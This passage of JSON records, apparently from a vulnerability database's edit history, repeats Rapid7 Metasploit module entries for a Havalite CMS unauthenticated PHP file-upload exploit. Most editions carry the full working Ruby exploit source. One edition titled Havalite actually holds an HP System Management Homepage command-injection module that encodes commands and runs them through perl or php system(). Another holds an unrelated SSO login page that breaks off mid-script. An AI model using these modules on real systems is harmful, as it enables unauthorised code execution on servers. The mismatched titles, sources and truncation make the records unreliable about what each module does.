"MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-22T08:58:43", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-07-22T08:58:43"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1785-1", "OPENSUSE-SU-2019:1782-1", "OPENSUSE-SU-2019:1781-1", "OPENSUSE-SU-2019:1777-1", "OPENSUSE-SU-2019:1780-1", "OPENSUSE-SU-2019:1775-1", "OPENSUSE-SU-2019:1771-1", "OPENSUSE-SU-2019:1773-1", "OPENSUSE-SU-2019:1759-1", "OPENSUSE-SU-2019:1767-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1859-1:5A253", "DEBIAN:DSA-4486-1:B09C5", "DEBIAN:DSA-4485-1:63763", "DEBIAN:DLA-1858-1:1A45F", "DEBIAN:DLA-1857-1:9A05E"]}], "modified": "2019-07-22T08:58:43"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload 
vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-22T08:58:43", "differentElements": ["sourceData"], "edition": 87}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "ebd00bcd8f62fd87e7aeeeb365c70a45", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-04T10:58:18", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2019-08-04T10:58:18"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1871-1:9568B", "DEBIAN:DLA-1870-1:FF601", "DEBIAN:DLA-1869-1:C14DF", "DEBIAN:DLA-1868-1:080D4", "DEBIAN:DLA-1867-1:C8700", "DEBIAN:DSA-4490-1:715F8", "DEBIAN:DLA-1866-1:D1352"]}, {"type": "mskb", "idList": ["KB4490496"]}, {"type": "gentoo", "idList": ["GLSA-201908-02", "GLSA-201908-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1824-1", "OPENSUSE-SU-2019:1826-1"]}, {"type": "slackware", "idList": ["SSA-2019-213-01"]}, {"type": "freebsd", "idList": ["6E65DFEA-B614-11E9-A3A2-1506E15611CC"]}, {"type": "ubuntu", "idList": ["USN-4069-2", "USN-4079-2", "USN-4085-1", "USN-4084-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2004", "RHSA-2019:2003"]}], "modified": "2019-08-04T10:58:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-04T10:58:18", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-04T13:15:51", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2019-08-04T13:15:51"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1871-1:9568B", "DEBIAN:DLA-1870-1:FF601", "DEBIAN:DLA-1869-1:C14DF", "DEBIAN:DLA-1868-1:080D4", "DEBIAN:DLA-1867-1:C8700", "DEBIAN:DSA-4490-1:715F8", "DEBIAN:DLA-1866-1:D1352"]}, {"type": "mskb", "idList": ["KB4490496"]}, {"type": "gentoo", "idList": ["GLSA-201908-02", "GLSA-201908-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1824-1", "OPENSUSE-SU-2019:1826-1"]}, {"type": "slackware", "idList": ["SSA-2019-213-01"]}, {"type": "freebsd", "idList": ["6E65DFEA-B614-11E9-A3A2-1506E15611CC"]}, {"type": "ubuntu", "idList": ["USN-4069-2", "USN-4079-2", "USN-4084-1", "USN-4085-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2004", "RHSA-2019:2003"]}], "modified": "2019-08-04T13:15:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. 
Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-04T13:15:51", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 89}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "97ae27eee03061e4dfa692f21662901f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module 
exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function.\n", "published": "2013-08-02T16:49:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3576"], "cvelist": ["CVE-2013-3576"], "lastseen": "2019-08-17T03:46:49", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-08-17T03:46:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3576"]}, {"type": "nessus", "idList": ["HPSMH_GINKGOSNMP_CMD_INJECTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122122"]}, {"type": "cert", "idList": ["VU:735364"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/HP_SYS_MGMT_EXEC"]}, {"type": "zdt", "idList": ["1337DAY-ID-20920"]}, {"type": "d2", "idList": ["D2SEC_HPSMH"]}, {"type": "dsquare", "idList": ["E-327"]}, {"type": "saint", "idList": ["SAINT:E4A60C12A1AE83FE30F35A3A418E9AB0", "SAINT:C3842DE44E21FBDC4C958E705CCD66C5", "SAINT:37B3DD6AD0CD94D2447AAA5F4E09A4CE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803846"]}, {"type": "exploitdb", "idList": ["EDB-ID:26420"]}], "modified": "2019-08-17T03:46:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/hp_sys_mgmt_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 
'Name' => \"HP System Management Homepage JustGetSNMPQueue Command Injection\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP System Management Homepage. By\n supplying a specially crafted HTTP request, it is possible to control the\n 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),\n which will be used in a exec() function.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Markus Wulftange', # Discovery & multi-platform Metasploit module\n 'sinn3r' # initial Windows Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2013-3576'],\n ['OSVDB', '94191'],\n ['US-CERT-VU', '735364']\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n ['Linux', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'CmdStagerFlavor' => 'bourne'\n }],\n ['Linux (x64)', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'CmdStagerFlavor' => 'bourne'\n }],\n ['Windows', {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'CmdStagerFlavor' => 'vbs'\n }],\n ['Windows (x64)', {\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'CmdStagerFlavor' => 'vbs'\n }],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 11 2013\"\n ))\n\n register_options(\n [\n Opt::RPORT(2381),\n # USERNAME/PASS may not be necessary, because the anonymous access is possible\n OptString.new(\"USERNAME\", [false, 'The username to authenticate as']),\n OptString.new(\"PASSWORD\", [false, 'The password to authenticate with'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def check\n @cookie = ''\n\n sig = Rex::Text.rand_text_alpha(10)\n cmd = \"echo #{sig}&&whoami&&echo #{sig}\"\n\n res = send_command(cmd)\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n if res.code == 200 && res.body =~ /#{sig}/\n vprint_good(\"Running with user '#{res.body.split(sig)[1].strip}'\")\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n 
def login\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n cookie = ''\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => '/proxy/ssllogin',\n 'vars_post' => {\n 'redirecturl' => '',\n 'redirectquerystring' => '',\n 'user' => username,\n 'password' => password\n }\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Connection timed out during login\")\n end\n\n # CpqElm-Login: success\n if res.headers['CpqElm-Login'].to_s =~ /success/\n cookie = res.get_cookies.scan(/(Compaq\\-HMMD=[\\w\\-]+)/).flatten[0] || ''\n end\n\n cookie\n end\n\n\n def setup_stager\n execute_cmdstager(:temp => './', :linemax => 2800)\n end\n\n\n def execute_command(cmd, opts={})\n # Encodes command as sequence of hex values to be passed to the Perl/PHP\n # function `pack(\"N*\", ...)` that is then used in a `system(...)` call.\n\n # trailing bytes need to be handled separately\n rem = cmd.size % 4\n if rem != 0\n last_bytes = \".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(\").chr(\")})\"\n cmd = cmd[0...-rem]\n end\n\n # convert double words into hex representation\n dwords = cmd.each_byte.each_slice(4).map { |dw|\n sprintf(\"0x%x\", dw.pack(\"C*\").unpack(\"N\")[0])\n }\n\n # build final Perl/PHP code that is getting executed\n script_code = \"system(pack(chr(78).chr(42),#{dwords.join(\",\")})#{last_bytes});\"\n\n # build Perl/PHP invocation command\n case target.opts['Platform']\n # Perl for Linux as it's more likely to be in the PATH\n when \"linux\" then cmd = \"perl -e '#{script_code}'\"\n # PHP for Windows\n when \"win\" then cmd = \"php -r #{script_code}\"\n end\n\n res = send_command(cmd)\n if res && res.code != 200\n vprint_error(\"Unexpected response:\\n#{res}\")\n fail_with(Failure::Unknown, \"There was an unexpected response\")\n end\n end\n\n\n def send_command(cmd)\n if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? 
&& @cookie.empty?\n @cookie = login\n if @cookie.empty?\n fail_with(Failure::NoAccess, \"#{peer} - Login failed\")\n else\n print_good(\"Logged in as '#{datastore['USERNAME']}'\")\n end\n end\n\n req_opts = {}\n req_opts['uri'] = generate_uri(cmd)\n unless @cookie.empty?\n browser_chk = 'HPSMH-browser-check=done for this session'\n curl_loc = \"curlocation-#{datastore['USERNAME']}=\"\n req_opts['cookie'] = \"#{@cookie}; #{browser_chk}; #{curl_loc}\"\n end\n\n send_request_raw(req_opts)\n end\n\n\n def generate_uri(cmd)\n \"#{normalize_uri(\"smhutil\",\"snmpchp/\")}&#{cmd.gsub(/ /, \"%20\")}&&echo\"\n end\n\n\n def exploit\n @cookie = ''\n\n setup_stager\n end\nend\n\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-17T03:46:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 90}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. 
Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-17T05:43:57", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-08-17T05:43:57"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2019:2473", "CESA-2019:2471"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4502-1:2AB9C", "DEBIAN:DLA-1888-1:33F1E", "DEBIAN:DLA-1886-1:800E7", "DEBIAN:DLA-1887-1:DF214", "DEBIAN:DSA-4501-1:7A4C9"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1923-1", "OPENSUSE-SU-2019:1924-1", "OPENSUSE-SU-2019:1921-1", "OPENSUSE-SU-2019:1920-1"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "mskb", "idList": ["KB4511872", "KB4512506"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2462", "ELSA-2019-4747"]}, {"type": "ubuntu", "idList": ["USN-4101-1"]}, {"type": "gentoo", "idList": ["GLSA-201908-20"]}, {"type": "redhat", "idList": ["RHSA-2019:2512", "RHSA-2019:2511"]}], "modified": "2019-08-17T05:43:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n 
possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? 
and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-17T05:43:57", "differentElements": ["modified", "published", "sourceData"], "edition": 91}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "77438aaa45a282c6a259c51523c76be1", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and 
possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T14:52:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-08-20T14:52:32"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:1D88818C1C20ADD5C17298B9EB532324"]}, {"type": "ubuntu", "idList": ["USN-4105-1", "USN-4103-2", "USN-4078-2", "USN-4104-1", "USN-4102-1"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4512491"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1959-1", "OPENSUSE-SU-2019:1954-1", "OPENSUSE-SU-2019:1952-1", "OPENSUSE-SU-2019:1951-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2519"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2002", "ELSA-2019-2511", "ELSA-2019-4756", "ELSA-2019-4753"]}], "modified": "2019-08-20T14:52:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script 
src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = 